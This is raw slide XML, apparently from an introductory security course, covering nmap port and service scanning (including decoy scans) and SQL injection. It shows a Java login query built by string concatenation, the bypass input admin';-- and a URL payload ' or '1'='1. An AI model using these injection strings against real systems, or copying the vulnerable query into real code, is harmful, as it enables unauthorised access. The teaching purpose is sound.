              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="247244" algn="just">
              <a:lnSpc>
                <a:spcPts val="1770"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>con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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>createStatement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(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select</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23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*</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14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TBL_USERS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endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2489152" algn="just">
              <a:lnSpc>
                <a:spcPts val="1828"/>
              </a:lnSpc>
            </a:pP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+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where</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23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username</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18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='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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F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username</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2489152" algn="just">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pP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+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'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18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and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password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=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'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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>password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+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'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)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1543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8EE5-BB97-BF34-D62A-D383DD2A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8" y="1033734"/>
            <a:ext cx="7424967" cy="491931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Filtered Ports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3012F-EC2F-3AEE-D161-B8317233DE72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539188" y="1754344"/>
            <a:ext cx="10885261" cy="1475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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>If result is DROPPED</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1798" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285464" indent="-285464">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>no answer received </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285464" indent="-285464">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> --max-retries by default 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285464" indent="-285464">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>What to do? –n (disable name resolution) –disable-arp-ping –Pn (disable ICMP echo requests) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-DE" sz="1798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E66EB-4623-33D3-DAB0-2CE09CEA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82" y="3124517"/>
            <a:ext cx="7764312" cy="2499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25D236-97F5-571E-2409-0B8E84DCBAC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691430" y="5712621"/>
            <a:ext cx="8830002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98" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> ICMP type 3 answer  likely that a firewall drops the packets</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1798" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333328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AFBB-45B2-98EA-29EF-57E6D61C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UDP Scans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3EC7B-91C5-5C89-A601-E8592EFB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9" y="2656099"/>
            <a:ext cx="7764312" cy="26491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4126BE-CA8E-8C1C-5F48-9F90AD8F7E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539188" y="1678224"/>
            <a:ext cx="10656899" cy="119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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>Why? Some admins forget to filter UDP ports in addition to TCP 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DE" sz="1798" dirty="0"/>
              <a:t>UDP scans take longer than TCP because they are without connection and therefore do not use acknowledgements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> longer timeout</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1798" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285464" indent="-285464">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="1798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30905-A5CE-9ED2-7035-DC5999F0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688" y="4205236"/>
            <a:ext cx="7764312" cy="26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79C8-44F8-5ECC-4CA2-A933FCC9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56" y="466468"/>
            <a:ext cx="7805570" cy="983860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Full Port and Service Scans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D6090-858F-6AAE-7F2C-A6F9C86CC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44" y="1678224"/>
            <a:ext cx="7764312" cy="2219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438997-0B08-1330-4A20-8DA6FAFFAC92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691430" y="4037966"/>
            <a:ext cx="10656899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98" dirty="0"/>
              <a:t>What if the service discovery does not work automatically?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9628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B75A-5E1F-7C8F-65F8-4F7756AE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7" y="196066"/>
            <a:ext cx="7348846" cy="1475791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Additional Information about nmap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22CF0-6CE7-61D3-A5B9-8C1631C05A3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463068" y="1737101"/>
            <a:ext cx="4719484" cy="25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98" dirty="0"/>
              <a:t>-sV additional information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>-v verbose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>-O OS scan / fingerprinting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>-A OS scan, service detection, tracing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>-D RND:5 random decoys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1798" dirty="0"/>
              <a:t>More information about port scanning techniques we can find at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1798" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007BFF"/>
                </a:solidFill>
                <a:latin typeface="neue-haas-unica"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://nmap.org/book/man-port-scanning-techniques.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1798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10953-B4C1-E9C8-B6BB-D349EE0D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501" y="1982707"/>
            <a:ext cx="6976369" cy="4169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1473F-DFCF-7101-B67B-840A62DF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68" y="4850422"/>
            <a:ext cx="4595075" cy="1073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C49498-AD69-24D8-5427-3A5D4C36E0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463067" y="4418569"/>
            <a:ext cx="4262760" cy="38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798" dirty="0"/>
              <a:t>Output formats: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CC695-7DB4-C232-A511-556F429CF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67" y="5924038"/>
            <a:ext cx="3698198" cy="8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D402-ED4E-AF0F-4B28-8467B34B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3" y="443532"/>
            <a:ext cx="7881691" cy="983860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Alternatives if service cannot be discovered automatically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842EE-3741-B56F-7FEE-0E8F3DCB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84" y="1826716"/>
            <a:ext cx="7764312" cy="1301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F79C3F-000B-FEDB-53C5-BE65FD67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4" y="3145515"/>
            <a:ext cx="7764312" cy="1301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2419FA-5013-8F84-BF49-9729375D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84" y="4446748"/>
            <a:ext cx="7764312" cy="1277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074B7-174A-B608-4EDA-53DDC6116809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8455742" y="1906586"/>
            <a:ext cx="2968708" cy="3136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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1798" dirty="0"/>
              <a:t>Nmap tries to identify services based on response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US" sz="1798" dirty="0"/>
              <a:t>If not directly, it tries to compare the signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285464" indent="-285464">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1798" dirty="0"/>
              <a:t>Some services suppress response and respond later or signature does not match </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1798" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1798" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1798" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> and connect with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1798" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1798" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10276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6D6A-0D54-3A4B-207E-1936C868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23" y="364090"/>
            <a:ext cx="5978673" cy="983860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>map scripting engine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FB588-514D-67E1-E3E4-29885BD14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58" y="1468251"/>
            <a:ext cx="7588042" cy="5368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4E7B5-CA73-8107-F047-71CE0E31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51" y="1513780"/>
            <a:ext cx="4531741" cy="1349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BF01B-09FE-7481-55A5-95B063B84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05" y="4012542"/>
            <a:ext cx="4223625" cy="282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4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2994-3C4C-A34F-FDA2-004CD629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BER CONTINUED…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C4F13-02D4-182A-7E6A-323FF92A5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4" y="553251"/>
            <a:ext cx="2996773" cy="5301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0541" y="530199"/>
            <a:ext cx="3273398" cy="5532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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="354" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="204" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0"/>
              <a:t>Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="64" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="103" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrong?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697137" y="1819806"/>
            <a:ext cx="3263025" cy="1179115"/>
            <a:chOff x="3805360" y="2005157"/>
            <a:chExt cx="3595370" cy="1299210"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4016316" y="2260599"/>
              <a:ext cx="3165475" cy="812800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3165475" h="812800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3164956" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3164956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A6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360" y="2005157"/>
              <a:ext cx="3594746" cy="129877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747466" y="3277195"/>
            <a:ext cx="7038383" cy="1411365"/>
            <a:chOff x="1657111" y="3610983"/>
            <a:chExt cx="7755255" cy="1555115"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1868213" y="3860800"/>
              <a:ext cx="7321550" cy="1066800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7321550" h="1066800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7321346" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7321346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A6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7111" y="3610983"/>
              <a:ext cx="7754990" cy="15545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368880" y="1532958"/>
            <a:ext cx="7545529" cy="4876516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>
              <a:spcBef>
                <a:spcPts val="109"/>
              </a:spcBef>
            </a:pP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What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if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input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from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client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is:</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="18"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2859">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="364814" algn="ctr"/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username</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14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admin';-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032CE6"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:endParaRPr sz="1543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543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="9"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2042">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11527"/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SQL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now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transforms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into:</a:t>
            </a:r>
            <a:endParaRPr sz="195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32">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="825298">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pP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select</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14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*</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14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from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 TBL_USERS</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="825298">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pP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where</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14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username =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5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'admin';</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>– ' and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C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5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>password = </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'123';</a:t>
            </a:r>
            <a:endParaRPr sz="1543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543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543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11527" marR="4611">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1384"/>
              </a:spcBef>
            </a:pP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Note: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Everything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after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-–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ignored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by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database,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since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it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23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is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marked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as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comment.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="-1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result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that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client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has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logged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as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the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admin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user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without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knowing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password.</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11527">
              <a:spcBef>
                <a:spcPts val="604"/>
              </a:spcBef>
            </a:pP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This</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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b="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known</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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spc="172" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack!</a:t>
            </a:r>
            <a:endParaRPr sz="1951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4" y="553251"/>
            <a:ext cx="2996773" cy="5301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0541" y="530199"/>
            <a:ext cx="3273398" cy="5532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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="354" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="204" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0"/>
              <a:t>Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="64" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="103" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrong?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51862" y="4795525"/>
            <a:ext cx="7553020" cy="1161250"/>
            <a:chOff x="1441584" y="5283958"/>
            <a:chExt cx="8322309" cy="1279525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1652131" y="5537199"/>
              <a:ext cx="7893684" cy="787400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7893684" h="787400">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7893326" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7893326" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78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A6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584" y="5283958"/>
              <a:ext cx="8322297" cy="127909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68879" y="4075779"/>
            <a:ext cx="7594515" cy="1410030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4611">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86"/>
              </a:spcBef>
            </a:pP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this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case,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injection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happens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when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attacker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modifies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URL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like</a:t>
            </a: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so:</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2768">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629348"/>
            <a:r>
              <a:rPr sz="1407" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://moviesite.com/dispatcher?action=profile&amp;id='</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1407" spc="113" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1407" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1407" spc="118" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1407" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'1'='1</a:t>
            </a:r>
            <a:endParaRPr sz="1407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14320" y="1760154"/>
            <a:ext cx="7628516" cy="2196865"/>
            <a:chOff x="1400219" y="1939429"/>
            <a:chExt cx="8405495" cy="2420620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1613999" y="2197099"/>
              <a:ext cx="7969884" cy="1930400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7969884" h="1930400">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7969591" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7969591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A6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219" y="1939429"/>
